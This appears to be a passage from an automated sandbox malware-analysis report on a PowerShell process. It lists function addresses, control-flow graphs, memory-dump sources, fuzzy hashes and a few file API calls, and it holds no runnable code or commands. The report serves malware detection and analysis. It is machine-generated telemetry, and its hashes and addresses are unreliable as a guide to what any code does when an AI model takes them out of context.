                                                                                                                                                                      Function 00007FFAAC5600DD Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.3903243488.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffaac560000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: aefa3e30122b462276e2e5fbc4a2dd9c01766e8fb88682a09030794554b3bc88
                                                                                                                                                                      • Instruction ID: ab91602ecb68527a2a390703578f50ed92c58cc3d2cdf2596c92ba657c3c5385
                                                                                                                                                                      • Opcode Fuzzy Hash: aefa3e30122b462276e2e5fbc4a2dd9c01766e8fb88682a09030794554b3bc88
                                                                                                                                                                      • Instruction Fuzzy Hash: DB410861A4D7C68FEB46DB1888905747FE5EFA7300B0D40EAD08ECB193D929EC49C791
                                                                                                                                                                      Function 00007FFAAC4937B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.3902397772.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffaac490000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                      • Instruction ID: c3fc78ce1376581358e69b537636a6d64aa010f4b71a55928409f2bd5aca84b3
                                                                                                                                                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                      • Instruction Fuzzy Hash: E201677111CB0D8FD744EF0CE451AA6B7E0FB95364F10456DE58AC3661DA36E882CB45

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:1.6%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                      Total number of Nodes:8
                                                                                                                                                                      Total number of Limit Nodes:1
                                                                                                                                                                      execution_graph 11316 7ffaac4845ea 11317 7ffaac4cfc60 GetFileType 11316->11317 11319 7ffaac4cfce4 11317->11319 11320 7ffaac48d4f9 11322 7ffaac48d549 11320->11322 11321 7ffaac48d552 11322->11321 11323 7ffaac48d67d CreateFileW 11322->11323 11324 7ffaac48d6de 11323->11324

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00007FFAAC486D80 Relevance: 6.3, Strings: 4, Instructions: 1289COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 0 7ffaac486d80-7ffaac48c3c0 5 7ffaac48c3c2-7ffaac48c3c7 call 7ffaac486de0 0->5 6 7ffaac48c3cc-7ffaac48c403 0->6 5->6 9 7ffaac48c5f4-7ffaac48c609 6->9 10 7ffaac48c409-7ffaac48c414 6->10 18 7ffaac48c613-7ffaac48c65e 9->18 19 7ffaac48c60b-7ffaac48c612 9->19 11 7ffaac48c482-7ffaac48c487 10->11 12 7ffaac48c416-7ffaac48c41e 10->12 13 7ffaac48c4f3-7ffaac48c4fd 11->13 14 7ffaac48c489-7ffaac48c495 11->14 12->9 16 7ffaac48c424-7ffaac48c439 12->16 20 7ffaac48c51f-7ffaac48c527 13->20 21 7ffaac48c4ff-7ffaac48c51d call 7ffaac486e00 13->21 14->9 17 7ffaac48c49b-7ffaac48c4ae 14->17 22 7ffaac48c462-7ffaac48c46d 16->22 23 7ffaac48c43b-7ffaac48c460 16->23 24 7ffaac48c52a-7ffaac48c535 17->24 44 7ffaac48c67b-7ffaac48c68c 18->44 45 7ffaac48c660-7ffaac48c666 18->45 19->18 20->24 21->20 22->9 27 7ffaac48c473-7ffaac48c480 22->27 23->22 30 7ffaac48c4b0-7ffaac48c4b3 23->30 24->9 28 7ffaac48c53b-7ffaac48c556 24->28 27->11 27->12 28->9 31 7ffaac48c55c-7ffaac48c56f 28->31 32 7ffaac48c4b5 30->32 33 7ffaac48c4bf-7ffaac48c4c7 30->33 31->9 36 7ffaac48c575-7ffaac48c586 31->36 32->33 33->9 37 7ffaac48c4cd-7ffaac48c4f2 33->37 36->9 43 7ffaac48c588-7ffaac48c597 36->43 48 7ffaac48c5e2-7ffaac48c5f3 43->48 49 7ffaac48c599-7ffaac48c5a4 43->49 46 7ffaac48c69d-7ffaac48c6c0 44->46 47 7ffaac48c68e-7ffaac48c699 44->47 50 7ffaac48c668-7ffaac48c679 45->50 51 7ffaac48c6c1-7ffaac48c73a 45->51 49->48 56 7ffaac48c5a6-7ffaac48c5dd call 7ffaac486e00 49->56 50->44 50->45 66 7ffaac48c73c-7ffaac48c74c 51->66 67 7ffaac48c74e-7ffaac48c75f 51->67 56->48 66->66 66->67 69 7ffaac48c770-7ffaac48c7a1 67->69 70 7ffaac48c761-7ffaac48c76f 67->70 74 7ffaac48c7a3-7ffaac48c7a9 69->74 75 7ffaac48c7f7-7ffaac48c7fe 69->75 70->69 74->75 78 7ffaac48c7ab-7ffaac48c7ac 74->78 76 7ffaac48c83f-7ffaac48c868 75->76 77 7ffaac48c800-7ffaac48c801 75->77 79 7ffaac48c804-7ffaac48c807 77->79 80 7ffaac48c7af-7ffaac48c7b2 78->80 81 7ffaac48c869-7ffaac48c9b8 79->81 82 7ffaac48c809-7ffaac48c81a 79->82 80->81 84 7ffaac48c7b8-7ffaac48c7c8 80->84 104 7ffaac48c9ba-7ffaac48ca2e call 7ffaac484620 81->104 105 7ffaac48ca2f-7ffaac48cb2c 81->105 85 7ffaac48c836-7ffaac48c83d 82->85 86 7ffaac48c81c-7ffaac48c822 82->86 87 7ffaac48c7ca-7ffaac48c7ec 84->87 88 7ffaac48c7f0-7ffaac48c7f5 84->88 85->76 85->79 86->81 89 7ffaac48c824-7ffaac48c832 86->89 87->88 88->75 88->80 89->85 104->105 125 7ffaac48cb33-7ffaac48cb93 105->125 126 7ffaac48cb9a-7ffaac48cbb6 125->126 128 7ffaac48cbb8-7ffaac48cbba 126->128 129 7ffaac48cbbc-7ffaac48cbd5 126->129 130 7ffaac48cbd7-7ffaac48cbe5 128->130 129->130 132 7ffaac48cc72-7ffaac48cc81 130->132 133 7ffaac48cbeb-7ffaac48cc5c call 7ffaac487be8 130->133 134 7ffaac48cc83-7ffaac48cc99 132->134 135 7ffaac48cc9b-7ffaac48cc9e 132->135 162 7ffaac48cc63-7ffaac48cc6b 133->162 163 7ffaac48cc5e-7ffaac48cc62 133->163 134->135 138 7ffaac48cca4-7ffaac48cd57 call 7ffaac487b98 135->138 139 7ffaac48cd58-7ffaac48cd98 135->139 138->139 152 7ffaac48ce89-7ffaac48ce97 call 7ffaac48cf2e 139->152 153 7ffaac48cd9e-7ffaac48cdac 139->153 167 7ffaac48ce99-7ffaac48cea9 152->167 168 7ffaac48ceaa-7ffaac48ceb5 152->168 156 7ffaac48cdb2-7ffaac48cdbd 153->156 157 7ffaac48ce41-7ffaac48ce6f 153->157 169 7ffaac48ce82-7ffaac48ce86 157->169 170 7ffaac48ce71-7ffaac48ce81 157->170 162->132 163->162 167->168 173 7ffaac48ceb7-7ffaac48cefb call 7ffaac482ed8 168->173 174 7ffaac48cf0d-7ffaac48cf2d 168->174 169->152 170->169 173->174
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000A.00000002.1475117820.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ffaac480000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: ZO_H$b4$b4$d
                                                                                                                                                                      • API String ID: 0-431963657
                                                                                                                                                                      • Opcode ID: 8102de08337eb39c6496de25d57a70b537ac2b8ec213b8912dfddbe3cfbca293
                                                                                                                                                                      • Instruction ID: 985713b9916bc0d58493f1bd425f3d775106bc30dadffb56ff194693c135b1ae
                                                                                                                                                                      • Opcode Fuzzy Hash: 8102de08337eb39c6496de25d57a70b537ac2b8ec213b8912dfddbe3cfbca293
                                                                                                                                                                      • Instruction Fuzzy Hash: 08826872A1DA8A8FE759DB28C4596B57BD0FF46314B0485BED09FC7193CE28E8478780
                                                                                                                                                                      Function 00007FFAAC48C93B Relevance: 1.7, Strings: 1, Instructions: 467COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000A.00000002.1475117820.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ffaac480000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: ZO_H
                                                                                                                                                                      • API String ID: 0-3138810398
                                                                                                                                                                      • Opcode ID: bac84709d5069c03b22ad8b422b8bbcd215f19edf15d5a8528c880f41134afbb
                                                                                                                                                                      • Instruction ID: ae351520fbb02ba462a98857bb3964f64488533fff1fcc4b8e73e111606b0b7f
                                                                                                                                                                      • Opcode Fuzzy Hash: bac84709d5069c03b22ad8b422b8bbcd215f19edf15d5a8528c880f41134afbb
                                                                                                                                                                      • Instruction Fuzzy Hash: 05E11862A1DA864FE749DB7C84696B97BD1EF96310B0485FED04FC72A3CD2898078784
                                                                                                                                                                      Function 00007FFAAC48CA35 Relevance: 1.6, Strings: 1, Instructions: 361COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000A.00000002.1475117820.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ffaac480000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: ZO_H
                                                                                                                                                                      • API String ID: 0-3138810398
                                                                                                                                                                      • Opcode ID: f8692e64acc7fd4e36dc488086dc97a6fedccbb76c9712acbc997bb875025332
                                                                                                                                                                      • Instruction ID: 23cb18cdd41686b39a48d295fd3b8343f40cd61583686cde3123ab51b44e9cbf
                                                                                                                                                                      • Opcode Fuzzy Hash: f8692e64acc7fd4e36dc488086dc97a6fedccbb76c9712acbc997bb875025332
                                                                                                                                                                      • Instruction Fuzzy Hash: 53B12862A1DAC64FE759DB7C44696B97BD1EF86310B0885FED04FC72A3CD2898078384
                                                                                                                                                                      Function 00007FFAAC48CA90 Relevance: .3, Instructions: 329COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000A.00000002.1475117820.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ffaac480000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 125f9ba6dc96aba6f61e8a4fa2cafe2775da0f0d8fce501532fd39758009ba0a
                                                                                                                                                                      • Instruction ID: 16dc09e1e1fbf8aec0f5b2c6202ecd8b3f9feb02c4d330ed90ea1f492f44726f
                                                                                                                                                                      • Opcode Fuzzy Hash: 125f9ba6dc96aba6f61e8a4fa2cafe2775da0f0d8fce501532fd39758009ba0a
                                                                                                                                                                      • Instruction Fuzzy Hash: CAA13662A1DAC64FE759DB7C44296B97FD1EF8A310B0884FED04EC72A3CD1898478384
                                                                                                                                                                      Function 00007FFAAC48D4F9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 242fileCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000A.00000002.1475117820.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ffaac480000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                      • String ID: p[
                                                                                                                                                                      • API String ID: 823142352-2643120810
                                                                                                                                                                      • Opcode ID: 0fcb830399a5985bc5e664c5b6b17ac1a061dc3af3a86de5bef8eb04e9073779
                                                                                                                                                                      • Instruction ID: 4c9c431916ed7392f2ccbc9880914f37c97ed9bd99276a79c955616ba7cf7349
                                                                                                                                                                      • Opcode Fuzzy Hash: 0fcb830399a5985bc5e664c5b6b17ac1a061dc3af3a86de5bef8eb04e9073779
                                                                                                                                                                      • Instruction Fuzzy Hash: 8071F57190DA498FE758DB6CD84A6B97BE0FF59324F0442BFE04DD7292DB24A80687C1
                                                                                                                                                                      Function 00007FFAAC4845DA Relevance: 1.6, APIs: 1, Instructions: 130fileCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 291 7ffaac4845da-7ffaac48d673 295 7ffaac48d675-7ffaac48d67a 291->295 296 7ffaac48d67d-7ffaac48d6dc CreateFileW 291->296 295->296 297 7ffaac48d6e4-7ffaac48d70c 296->297 298 7ffaac48d6de 296->298 298->297
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000A.00000002.1475117820.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ffaac480000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                      • Opcode ID: eb1273d326e3820228fd768780aa0dc83254307177dcd457df0615641f6f7165
                                                                                                                                                                      • Instruction ID: 52e16225df2f551e1f55223d8f800ac6422a8413d754e262e145850ef772c25c
                                                                                                                                                                      • Opcode Fuzzy Hash: eb1273d326e3820228fd768780aa0dc83254307177dcd457df0615641f6f7165
                                                                                                                                                                      • Instruction Fuzzy Hash: AD31807191CA1C9FDB58EF58D849AF97BE0FB69321F10422EE04EE3251CB71A9058BC5
                                                                                                                                                                      Function 00007FFAAC4845EA Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 370 7ffaac4845ea-7ffaac4cfce2 GetFileType 374 7ffaac4cfce4 370->374 375 7ffaac4cfcea-7ffaac4cfd0f 370->375 374->375
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000A.00000002.1475117820.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ffaac480000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileType
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3081899298-0
                                                                                                                                                                      • Opcode ID: 81b60499c08e8c82a804a794d10570f125011b4792410e7ca6f7363a8d9b032c
                                                                                                                                                                      • Instruction ID: 97cd65ffa43a160653f9e3cc3a3b104d9244b70342463990b893b1130d222353
                                                                                                                                                                      • Opcode Fuzzy Hash: 81b60499c08e8c82a804a794d10570f125011b4792410e7ca6f7363a8d9b032c
                                                                                                                                                                      • Instruction Fuzzy Hash: CB21A471A0CA0C9FEB58DB58D449BF9B7E0FB55321F00412ED04ED3651DB75A816CB81
                                                                                                                                                                      Function 00007FFAAC5515DD Relevance: .7, Instructions: 673COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 377 7ffaac5515dd-7ffaac5515e7 378 7ffaac5515ee-7ffaac5515f3 377->378 379 7ffaac5515e9 377->379 381 7ffaac5515f4-7ffaac5515ff 378->381 379->378 380 7ffaac5515eb 379->380 380->378 382 7ffaac551601 381->382 383 7ffaac551606-7ffaac551617 381->383 382->383 384 7ffaac551603 382->384 385 7ffaac55161e-7ffaac55162f 383->385 386 7ffaac551619 383->386 384->383 388 7ffaac551631 385->388 389 7ffaac551636-7ffaac551647 385->389 386->385 387 7ffaac55161b 386->387 387->385 388->389 390 7ffaac551633 388->390 391 7ffaac55164e-7ffaac551660 389->391 392 7ffaac551649 389->392 390->389 391->381 394 7ffaac551662-7ffaac5516bb 391->394 392->391 393 7ffaac55164b 392->393 393->391 396 7ffaac5516bd-7ffaac551704 394->396 397 7ffaac551705 394->397 396->397 399 7ffaac551737-7ffaac551739 397->399 400 7ffaac551707-7ffaac55170f 397->400 401 7ffaac55173b-7ffaac551748 399->401 403 7ffaac551926-7ffaac5519a5 400->403 404 7ffaac551715-7ffaac55171f 400->404 410 7ffaac55174e-7ffaac551751 401->410 411 7ffaac5518bb-7ffaac5518c5 401->411 433 7ffaac5519ac-7ffaac5519bb 403->433 404->401 405 7ffaac551721-7ffaac551731 404->405 405->399 410->411 413 7ffaac551757-7ffaac55175f 410->413 414 7ffaac5518c7-7ffaac5518d7 411->414 415 7ffaac5518d8-7ffaac551923 411->415 413->403 417 7ffaac551765-7ffaac55176f 413->417 415->403 420 7ffaac551771-7ffaac55177f 417->420 421 7ffaac551789-7ffaac55178f 417->421 420->421 428 7ffaac551781-7ffaac551787 420->428 421->411 422 7ffaac551795-7ffaac551798 421->422 425 7ffaac5517e1 422->425 426 7ffaac55179a-7ffaac5517ad 422->426 430 7ffaac5517e3-7ffaac5517e5 425->430 426->403 435 7ffaac5517b3-7ffaac5517bd 426->435 428->421 430->411 432 7ffaac5517eb-7ffaac5517ee 430->432 436 7ffaac5517f0-7ffaac5517f9 432->436 437 7ffaac551805-7ffaac551809 432->437 442 7ffaac5519c6 433->442 439 7ffaac5517bf-7ffaac5517d4 435->439 440 7ffaac5517d6-7ffaac5517df 435->440 436->437 437->411 443 7ffaac55180f-7ffaac551815 437->443 439->440 440->430 445 7ffaac5519c9-7ffaac5519d7 442->445 446 7ffaac551831-7ffaac551837 443->446 447 7ffaac551817-7ffaac551824 443->447 448 7ffaac5519e0-7ffaac5519ef 445->448 449 7ffaac5519d9 445->449 451 7ffaac551839-7ffaac551846 446->451 452 7ffaac551853-7ffaac551890 446->452 447->446 456 7ffaac551826-7ffaac55182f 447->456 454 7ffaac5519f1 448->454 455 7ffaac5519f8-7ffaac551a10 448->455 449->448 451->452 460 7ffaac551848-7ffaac551851 451->460 476 7ffaac5518a9-7ffaac5518ba 452->476 477 7ffaac551892-7ffaac5518a7 452->477 454->455 455->445 459 7ffaac551a12 455->459 456->446 462 7ffaac551a90-7ffaac551a92 459->462 463 7ffaac551a14-7ffaac551a75 459->463 460->452 465 7ffaac551a94-7ffaac551aaa 462->465 481 7ffaac551a77-7ffaac551a87 463->481 482 7ffaac551ae8-7ffaac551af2 463->482 474 7ffaac551afa-7ffaac551afb 465->474 475 7ffaac551aac-7ffaac551ae5 465->475 475->482 477->476 481->465 488 7ffaac551a89-7ffaac551a8a 481->488 484 7ffaac551afc-7ffaac551b41 482->484 485 7ffaac551af4-7ffaac551af9 482->485 485->474 488->462
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000A.00000002.1476250150.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ffaac550000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 1154cee72753838b8f077f25b775e6348272ad8ca7963d21dfd24685b29e8231
                                                                                                                                                                      • Instruction ID: 6c428e8a011c2a73d3142869c9a8ded35055b2260608f891d1910e03c64272d5
                                                                                                                                                                      • Opcode Fuzzy Hash: 1154cee72753838b8f077f25b775e6348272ad8ca7963d21dfd24685b29e8231
                                                                                                                                                                      • Instruction Fuzzy Hash: AA12F462D4EBCA5FE356972858255B57FE5EF43210B0981FFE08EC70A3D9199C0A8392

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      Function 00007FFAAC48EDE0 Relevance: 24.7, Strings: 18, Instructions: 2203COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000A.00000002.1475117820.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_10_2_7ffaac480000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: }$ }$ }$0#$0#$0X$0X$8h$8h$8h$Xk$Xk$uW_I$x!$x!$xL_L$yL_L$~W_I
                                                                                                                                                                      • API String ID: 0-179582078
                                                                                                                                                                      • Opcode ID: b690397efd4b3d0ddab495b33131b7057306825b1f7fedfabae572cd40037d3b
                                                                                                                                                                      • Instruction ID: d23a8b938e0aa958f52db04b4feabc4c0f19d80f194de1e9dd66e7de89b259ec
                                                                                                                                                                      • Opcode Fuzzy Hash: b690397efd4b3d0ddab495b33131b7057306825b1f7fedfabae572cd40037d3b
                                                                                                                                                                      • Instruction Fuzzy Hash: B4E23471A0DB068FFB98DB2C845AA7477D1EF66308B1481B9D44ED7293DE24EC4A87C4